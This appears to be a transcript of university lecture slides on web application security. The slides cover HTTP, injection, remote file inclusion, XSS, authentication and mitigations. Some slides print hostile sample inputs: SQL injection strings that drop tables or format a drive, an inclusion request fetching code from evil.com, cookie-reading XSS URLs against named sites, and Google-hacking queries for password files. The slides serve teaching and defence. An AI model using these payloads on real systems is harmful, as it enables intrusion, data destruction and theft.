Transcript WebSecurity
CIT 380: Securing Computer
Systems
Web Security
CIT 380: Securing Computer Systems
Slide #1
Topics
1.
2.
3.
4.
5.
HTTP
Web Input
Web Application Vulnerabilities
Client-side Attacks
Finding Web Vulnerabilities
CIT 380: Securing Computer Systems
Slide #2
Web Transactions
Web Server
Web Browser
Network
OS
CIT 380: Securing Computer Systems
Slide #3
HTTP: HyperText Transfer Protocol
Simple request/respond protocol
– Request methods: GET, POST, HEAD, etc.
– Protocol versions: 1.0, 1.1
Stateless
– Each request independent of previous requests,
i.e. request #2 doesn’t know you auth’d in #1.
– Applications responsible for handling state.
CIT 380: Securing Computer Systems
Slide #4
HTTP Request
Method
URL
Protocol Version
GET http://www.google.com/ HTTP/1.1
Headers
Host: www.google.com
User-Agent: Mozilla/5.0 (Windows NT 5.1)
Gecko/20060909 Firefox/1.5.0.7
Accept: text/html, image/png, */*
Accept-Language: en-us,en;q=0.5
Cookie: rememberme=true;
PREF=ID=21039ab4bbc49153:FF=4
Blank Line
No Data for GET method
CIT 380: Securing Computer Systems
Slide #5
HTTP Response
Protocol Version
HTTP Response Code
HTTP/1.1 200 OK
Headers
Cache-Control: private
Content-Type: text/html
Blank
Server: GWS/2.1
Line
Date: Fri, 13 Oct 2006 03:16:30 GMT
<HTML> ... (page data) ... </HTML>
Web Page Data
CIT 380: Securing Computer Systems
Slide #6
Different Perspectives
Client Side
• HTTP requests may
reveal private info.
• HTTP responses may
reveal private info.
• HTTP responses may
include malicious code
(Java, ActiveX,
Javascript)
Server Side
• HTTP requests may contain
malicious input.
• HTTP requests may have
forged authentication.
• HTTP responses may be
intercepted.
CIT 380: Securing Computer Systems
Slide #7
Web-based Input
• Client and Server Perspectives
• Types of Input
–
–
–
–
URL parameters
HTML
Cookies
Javascript
• Cross-Site Scripting
CIT 380: Securing Computer Systems
Slide #8
URL Format
<proto>://<user>@<host>:<port>/<path>?<qstr>
– Whitespace marks end of URL
– “@” separates userinfo from host
– “?” marks beginning of query string
– “&” separates query parameters
– %HH represents character with hex values
– ex: %20 represents a space
http://username:[email protected]:8001/a%20spaced%20path
CIT 380: Securing Computer Systems
Slide #9
URL Parameters
• Client controls query-string
– Cannot limit values to those specified in form
• Any character can be URL-encoded
– Even if it doesn’t need to be.
• Any valid format may be used to disguise
true destination of URL
CIT 380: Securing Computer Systems
Slide #10
URL Obfuscation
• IP address representations
– Dotted quad (decimal, octal, hexadecimal)
– Hexadecimal without dots (with left padding)
– dword (32-bit int)
• Examples: www.eecs.utoledo.edu
– 131.183.19.14 (dotted quad)
– 0xDEDA83B7130E (hexadecimal + padding)
– 2209813262 (dword)
CIT 380: Securing Computer Systems
Slide #11
HTML Special Characters
• “<“ begins a tag
• “>” ends a tag
– some browsers will auto-insert matching “<“
• “&” begins a character entity
– ex: < represents literal “<“ character
• Quotes(‘ and “) used to enclose attribute
values
CIT 380: Securing Computer Systems
Slide #12
Character Set Encoding
•
•
•
•
Default: ISO-8859-1 (Latin-1)
Char sets dictate which chars are special
UTF-8 allows multiple representations
Force Latin-1 encoding of web page with:
– <META http-equiv=“Content-Type”
content=“text/html; charset=ISO-8859-1”>
CIT 380: Securing Computer Systems
Slide #13
Hidden Fields
<input type=“hidden” name=“user”
value=“james”>
• Used to propagate data between HTTP
requests since protocol is stateless
• Clearly visible in HTML source
• Form can be copied, modified to change
hidden fields, then used to invoke script
CIT 380: Securing Computer Systems
Slide #14
Cookies
Server to Client
Content-type: text/html
Set-Cookie: foo=bar; path=/; expires Fri, 20-Feb2004 23:59:00 GMT
Client to Server
Content-type: text/html
Cookie: foo=bar
CIT 380: Securing Computer Systems
Slide #15
Web Input Summary
Client Side
• URLs may not lead
where they seem to.
• Cookies can be used to
track your browsing.
• Pages may include
malicious code (Java,
ActiveX, Javascript)
Server Side
•
•
•
•
•
•
CIT 380: Securing Computer Systems
Cookies aren’t confidential.
Hidden fields aren’t secret.
Client may use own forms.
URLs can have any format.
POST data can have any format.
Cookies can have any format.
Slide #16
Web Application Vulnerabilities
Input-based Security Problems
– Injection Flaws
– Insecure Remote File Inclusion
– Unvalidated Input
Authentication and Authorization
– Authentication
– Access Control
– Cross-Site Scripting
Other Bugs
– Error Handling and Information Leakage
– Insecure Storage
– Insecure Communications
CIT 380: Securing Computer Systems
Slide #17
Injection
• Injection attacks trick an application into
including unintended commands in the data
send to an interpreter.
• Interpreters
– Interpret strings as commands.
– Ex: SQL, shell (cmd.exe, bash), LDAP, XPath
• Key Idea
– Input data from the application is executed as code
by the interpreter.
CIT 380: Securing Computer Systems
Slide #18
SQL Injection
1.
2.
3.
4.
5.
6.
App sends form to user.
Attacker submits form
with SQL exploit data.
Application builds string
with exploit data.
Application sends SQL
query to DB.
DB executes query,
including exploit, sends
data back to application.
Application returns data to
user.
Attacker
User ‘ or 1=1-Pass
Firewall
Web Server
CIT 380: Securing Computer Systems
DB Server
Slide #19
SQL Injection in PHP
$link = mysql_connect($DB_HOST,
$DB_USERNAME, $DB_PASSWORD) or die
("Couldn't connect: " . mysql_error());
mysql_select_db($DB_DATABASE);
$query = "select count(*) from users where username
= '$username' and password = '$password'";
$result = mysql_query($query);
CIT 380: Securing Computer Systems
Slide #20
SQL Injection Attack #1
Unauthorized Access Attempt:
password = ’ or 1=1 --
SQL statement becomes:
select count(*) from users where username =
‘user’ and password = ‘’ or 1=1 -Checks if password is empty OR 1=1, which is
always true, permitting access.
CIT 380: Securing Computer Systems
Slide #21
SQL Injection Attack #2
Database Modification Attack:
password = foo’; delete from table users
where username like ‘%
Database executes two SQL statements:
select count(*) from users where username =
‘user’ and password = ‘foo’
delete from table users where username like ‘%’
CIT 380: Securing Computer Systems
Slide #22
Impact of SQL Injection
SELECT SSN FROM USERS WHERE UID=‘$UID’
INPUT
RESULT
5
Returns info for user with UID 5.
‘ OR 1=1--
Returns info for all users.
‘ UNION SELECT
Field FROM Table
WHERE 1=1--
Returns all rows from another table.
‘;DROP TABLE
USERS--
Deletes the users table.
‘;master.dbo.xp_cmd Formats C: drive of database server if you’re
shell ‘cmd.exe
running MS SQL Server and extended procedures
format c: /q /yes’ -aren’t disabled.
CIT 380: Securing Computer Systems
Slide #23
Mitigation: Prepared Queries
require_once 'MDB2.php';
$mdb2 =& MDB2::factory($dsn, $options);
if (PEAR::isError($mdb2)) {
die($mdb2->getMessage());
}
$sql = “SELECT count(*) from users where username = ? and password = ?”;
$types = array('text', 'text');
$sth = $mdb2->prepare($sql, $types, MDB2_PREPARE_MANIP);
$data = array($username, $password);
$sth->execute($data);
CIT 380: Securing Computer Systems
Slide #24
Insecure Remote File Inclusion
• Insecure remote file inclusion vulnerabilities
allow an attack to trick the application into
executing code provided by the attacker on
another site.
• Dynamic code
– Includes in PHP, Java, .NET
– DTDs for XML documents
• Key Idea
– Attacker controls pathname for inclusion.
CIT 380: Securing Computer Systems
Slide #25
PHP Remote Inclusion Flaw
A PHP product uses "require" or "include" statements, or
equivalent statements, that use attacker-controlled data to
identify code or HTML to be directly processed by the PHP
interpreter before inclusion in the script.
<?php
// index.php
include('config.php');
include('include.php');
// Script body
?>
<?php //config.php
$server_root = '/my/path';
?>
<?php //include.php
include($server_root .
'/someotherfile.php');
?>
GET /include.php?server_root=http://evil.com/command.txt
CIT 380: Securing Computer Systems
Slide #26
Mitigating Remote File Inclusion
1.
2.
3.
4.
Turn off remote file inclusion.
Do not run code from uploaded files.
Do not use user-supplied paths.
Validate all paths before loading code.
CIT 380: Securing Computer Systems
Slide #27
Unvalidated Input
• Unvalidated input is an architecture flaw.
– Individual input-related bugs are easy to fix.
– How do you defend against the general problem
of input-based attacks?
• Key Ideas
– Application needs to validate all input.
– Input validation needs to be part of design.
CIT 380: Securing Computer Systems
Slide #28
Input Validation Solutions
•
•
•
•
All input must be validated.
Input must be validated on the server.
Use a standard set of validation rules.
Reject all input that isn’t in your whitelist.
– Blacklists can miss bad inputs.
– Input repairs can produce bad input.
CIT 380: Securing Computer Systems
Slide #29
Authentication
• Authentication is the process of determining
a user’s identity.
• Key Ideas
–
–
–
–
HTTP is a stateless protocol.
Every request must be authenticated.
Use username/password on first request.
Use session IDs on subsequent queries.
CIT 380: Securing Computer Systems
Slide #30
Authentication Attacks
•
•
•
•
•
•
Sniffing passwords
Guessing passwords
Identity management attacks
Replay attacks
Session ID fixation
Session ID guessing
CIT 380: Securing Computer Systems
Slide #31
Identity Management Attacks
Auth requires identity management
– User registration
– Password changes and resets
Mitigations
– Use CAPTCHAs to protect registration.
– Don’t use easy to guess secret questions.
– Don’t allow attacker to reset e-mail address that
new password is sent to.
CIT 380: Securing Computer Systems
Slide #32
Session ID Guessing
Do session IDs show a pattern?
– How does changing username change ID?
– How do session IDs change with time?
Brute forcing session IDs
– Use program to try 1000s of session IDs.
Mitigating guessing attacks
– Use a large key space (128+ bits).
– Use a cryptographically random algorithm.
CIT 380: Securing Computer Systems
Slide #33
Mitigating Authentication
Attacks
•
•
•
•
Use SSL to prevent sniffing attacks.
Require strong passwords.
Use secure identity management.
Use a secure session ID mechanism.
– IDs chosen at random from large space.
– Regenerate session IDs with each request.
– Expire session IDs in short time.
CIT 380: Securing Computer Systems
Slide #34
Access Control
• Access control determines which users have
access to which system resources.
• Levels of access control
–
–
–
–
–
Site
URL
Function
Function(parameters)
Data
CIT 380: Securing Computer Systems
Slide #35
Mitigating Broken Access Control
1.
2.
3.
4.
Check every access.
Use whitelist model at every layer.
Do not rely on client-level access control.
Do not rely on security through obscurity.
CIT 380: Securing Computer Systems
Slide #36
Cross-Site Scripting (XSS)
• Attacker causes a legitimate web server to send user
executable content (Javascript, Flash ActiveScript)
of attacker’s choosing.
• XSS used to obtain session ID for
– Bank site (transfer money to attacker)
– Shopping site (buy goods for attacker)
– E-mail
• Key ideas
– Attacker sends malicious code to server.
– Victim’s browser loads code from server and runs it.
CIT 380: Securing Computer Systems
Slide #37
XSS Attacks
MySpace worm (October 2005)
– When someone viewed Samy’s profile:
• Set him as friend of viewer.
• Incorporated code in viewer’s profile.
Paypal (2006)
– XSS redirect used to steal money from Paypal users in a
phishing scam.
BBC, CBS (2006)
– By following XSS link from securitylab.ru, you could
read an apparently valid story on the BBC or CBS site
claiming that Bush appointed a 9-year old as head of the
Information Security department.
CIT 380: Securing Computer Systems
Slide #38
Stored XSS
Stored XSS
– Injected script stored in comment, message, etc.
– Requires ability to insert malicious code into
web documents (comments, reviews, etc.)
– Persistent until message deleted.
CIT 380: Securing Computer Systems
Slide #39
Reflected XSS
Reflected XSS
– Injected script returned by one-time message.
– Requires tricking user to click on link.
– Non-persistent. Only works when user clicks.
CIT 380: Securing Computer Systems
Slide #40
Why does XSS Work?
Same-Origin Policy
– Browser only allows Javascript from site X to
access cookies and other data from site X.
– Attacker needs to make attack come from site X.
Vulnerable Server Program
– Any program that returns user input without
filtering out dangerous code.
CIT 380: Securing Computer Systems
Slide #41
Anatomy of an XSS Attack
Web Server
Attacker
User
3. XSS Attack
7. Browser runs
injected code.
4. User clicks on XSS link.
CIT 380: Securing Computer Systems
Evil site saves ID.
Slide #42
XSS URL Examples
http://www.microsoft.com/education/?ID=MCTN&target
=http://www.microsoft.com/education/?ID=MCTN&tar
get="><script>alert(document.cookie)</script>
http://hotwired.lycos.com/webmonkey/00/18/index3a_
page2.html?tw=<script>alert(‘Test’);</script>
http://www.shopnbc.com/listing.asp?qu=<script>aler
t(document.cookie)</script>&frompage=4&page=1&ct
=VVTV&mh=0&sh=0&RN=1
http://www.oracle.co.jp/mts_sem_owa/MTS_SEM/im_sea
rch_exe?search_text=_%22%3E%3Cscript%3Ealert%28d
ocument.cookie%29%3C%2Fscript%3E
CIT 380: Securing Computer Systems
Slide #43
Mitigating XSS
1. Disallow HTML input
2. Allow only safe HTML tags
3. Filter output
Replace HTML special characters in output
ex: replace < with < and > with >
also replace (, ), #, &
4. Tagged cookies
Include IP address in cookie and only allow access to
original IP address that cookie was created for.
5. Client: disable Javascript
Use NoScript extension for Firefox.
CIT 380: Securing Computer Systems
Slide #44
Improper Error Handling
• Applications can unintentionally leak
information about configuration,
architecture, or sensitive data when handling
errors improperly.
• Errors can provide too much data
–
–
–
–
Stack traces
SQL statements
Subsystem errors
User typos, such as passwords.
CIT 380: Securing Computer Systems
Slide #45
Example of Improper Error
Handling
mySQL error with query SELECT
COUNT(*) FROM nucleus_comment as c
WHERE c.citem=90: Can't open file:
'nucleus_comment.MYI' (errno: 145)
Warning: mysql_fetch_row(): supplied
argument is not a valid MySQL result
resource in
/home/exalt2/public_html/username/nucle
us/libs/COMMENTS.php on line 124
CIT 380: Securing Computer Systems
Slide #46
Mitigating Improper Error Handling
1.
2.
3.
4.
5.
6.
Catch all exceptions.
Check all error codes.
Wrap application with catch-all handler.
Send user-friendly message to user.
Store details for debugging in log files.
Don’t log passwords or other sensitive
data.
CIT 380: Securing Computer Systems
Slide #47
Insecure Storage
• Storing sensitive data without encrypting it,
or using a weak encryption algorithm, or
using a strong encryption system improperly.
• Problems
–
–
–
–
Not encrypting sensitive data.
Using home grown cryptography.
Insecure use of weak algorithms.
Storing keys in code or unprotected files.
CIT 380: Securing Computer Systems
Slide #48
Storage Recommendations
Hash algorithms
– MD5 and SHA1 look insecure.
– Use SHA256.
Encrypting data
– Use AES with 128-bit keys.
Key generation
– Generate random keys.
– Use secure random source.
CIT 380: Securing Computer Systems
Slide #49
Mitigating Insecure Storage
1.
2.
3.
4.
Use well studied public algorithms.
Use truly random keys.
Store keys in protected files.
Review code to ensure that all sensitive
data is being encrypted.
5. Check database to ensure that all sensitive
data is being encrypted.
CIT 380: Securing Computer Systems
Slide #50
Insecure Communication
• Applications fail to encrypt sensitive data in
transit from client to server and vice-versa.
• Need to protect
– User authentication and session data.
– Sensitive data (CC numbers, SSNs)
• Key Idea
– Use SSL for all authentication connections.
CIT 380: Securing Computer Systems
Slide #51
Mitigating Insecure Communication
1. Use SSL for all authenticated sessions.
2. Use SSL for all sensitive data.
3. Verify that SSL is used with automated
vulnerability scanning tools.
CIT 380: Securing Computer Systems
Slide #52
Client-side Attacks
• Buffer Overflow
– 2004 iframe
– 2004-05 jpeg
• Remote Code
–
–
–
–
ActiveX
Flash
Java
Javascript
CIT 380: Securing Computer Systems
Slide #53
ActiveX
Executable code downloaded from server
– Activated by HTML object tag.
– Native code binary format.
Security model
– Digital signature
authentication
– Zone-based access
control
– No control once
execution starts
CIT 380: Securing Computer Systems
Slide #54
Java
• Digital signature authentication
• Sandbox
Sandbox Components
Sandbox Limits
• Byte-code verifier
• Class loader
• Security manager
CIT 380: Securing Computer Systems
• Cannot read/write files.
• Cannot start programs.
• Network access limited
to originating host.
Slide #55
MPack Browser Malware
1.
2.
3.
4.
5.
6.
7.
User visits site.
Response contains
iframe.
Iframe code causes
browser to make request.
Request redirected to
MPack server.
Server identifies OS and
browser, sends exploit
that will work for client
configuration.
Exploit causes browser to
send request for code.
Mpack downloader sent
to user, begins d/ling
other malware.
CIT 380: Securing Computer Systems
Slide #56
MPack
Commercial underground PHP software
– Sold for $700-1000.
– Comes with one year technical support.
– Can purchase updated exploits for $50-150.
Infection Techniques
–
–
–
–
Hacking into websites and adding iframes.
Sending HTML mail with iframes.
Typo-squatting domains.
Use GoogleAds to draw traffic.
CIT 380: Securing Computer Systems
Slide #57
Client Protection
•
•
•
•
Disable ActiveX and Java.
Use NoScript to limit Javascript.
Run browser with least privilege.
Use a browser sandbox:
– VMWare Virtual Browser Appliance
– Protected Mode IE (Windows Vista)
•
•
•
•
Goto sites directly instead of using links.
Use plain text e-mail instead of HTML.
Patch your browser regularly.
Use a personal firewall.
CIT 380: Securing Computer Systems
Slide #58
Web Reconnaissance
Google Hacking
–
–
–
–
“Index of” +passwd
“Index of” +password.txt
filetype:htaccess user
allinurl:_vti_bin shtml.exe
Web Crawling
Santy Worm used Google
to find vulnerable servers.
– wget --mirror http://www.w3.org/ -o /mirror/w3
CIT 380: Securing Computer Systems
Slide #59
Proxies and Vulnerability Scanners
•
•
•
•
Achilles
OWASP Web Scarab
Paros Proxy
SPI Dynamics WebInspect
Edit Web Data
• URL
• Cookies
• Form Data
Web Browser
Web Proxy
CIT 380: Securing Computer Systems
Web Server
Slide #60
Achilles Proxy Screenshot
CIT 380: Securing Computer Systems
Slide #61
Key Points
• All input can be dangerous
– URLs, Cookies, Executable content
• Consider both client and server security.
• SSL is not a panacea
– Confidentiality + integrity of data in transit.
– Input-based attacks can be delivered via SSL.
• Top Vulnerabilities
– Cross-Site Scripting
– SQL Injection
– Remote File Inclusion
CIT 380: Securing Computer Systems
Slide #62
References
1.
2.
3.
4.
5.
6.
7.
8.
9.
10.
11.
12.
13.
14.
15.
16.
17.
18.
19.
20.
21.
Chris Anley, “Advanced SQL Injection In SQL Server Applications,” http://www.nextgenss.com/papers/advanced_sql_injection.pdf, 2002.
CERT, “Understanding Malicious Content Mitigation for Web Developers,” http://www.cert.org/tech_tips/malicious_code_mitigation.html,
Feb. 2000
Mark Dowd, John McDonald, Justin Schuh, The Art of Software Security Assessment, Addison-Wesley, 2007.
David Endler, “The Evolution of Cross-Site Scripting Attacks,” http://www.cgisecurity.com/development/xss.shtml, 2002.
Joris Evers, “Paypal fixes Phishing hole,” http://news.com.com/PayPal+fixes+phishing+hole/2100-7349_3-6084974.html, 2006.
Stephen J. Friedl, “SQL Injection Attacks by Example,” http://www.unixwiz.net/techtips/sql-injection.html, 2005.
Johnny Long, Google Hacking for Penetration Testers, Syngress, 2004.
Johnny Long, Google Hacking Database, http://johnny.ihackstuff.com, 2006.
J.D. Meier, et. al., Improving Web Application Security: Threats and Countermeasures, Microsoft, http://msdn2.microsoft.com/enus/library/aa302418.aspx, 2006.
Mitre, Common Weaknesses – Vulnerability Trends, http://cwe.mitre.org/documents/vuln-trends.html, 2007.
Nate Mook, “Cross-Site Scripting Worm Hits MySpace,”
http://www.betanews.com/article/CrossSite_Scripting_Worm_Hits_MySpace/1129232391, 2005.
Gunter Ollman, “HTML Code Injection and Cross-Site Scripting,” http://www.technicalinfo.net/papers/CSS.html, 2002.
OWASP Top 10, http://www.owasp.org/index.php/OWASP_Top_Ten_Project, 2007.
Neils Provos et. al., “The Ghost in the Browser: Analysis of Web-based Malware,” Hotbots 07,
http://www.usenix.org/events/hotbots07/tech/full_papers/provos/provos.pdf, 2007.
Samy, “MySpace Worm Explanation,” http://namb.la/popular/tech.html, 2005.
Stuart McClure, Joel Scambray, and George Kurtz, Hacking Exposed, 5/e, McGraw-Hill, 2005.
Stuart McClure, Saumil Shah and Shreeraj Shah, Web Hacking: Attacks and Defense, Addison-Wesley, 2002.
Joel Scambray, Mike Shema, Caleb Sima, Hacking Exposed Web Applications, Second Edition, McGraw-Hill, 2006.
Ed Skoudis, Counter Hack Reloaded, Prentice Hall, 2006.
SK, “SQL Injection Walkthrough,” http://www.securiteam.com/securityreviews/5DP0N1P76E.html, 2002.
Symantec Weblog, “MPack: Packed full of badness,”
http://www.symantec.com/enterprise/security_response/weblog/2007/05/mpack_packed_full_of_badness.html, 2007.
CIT 380: Securing Computer Systems
Slide #63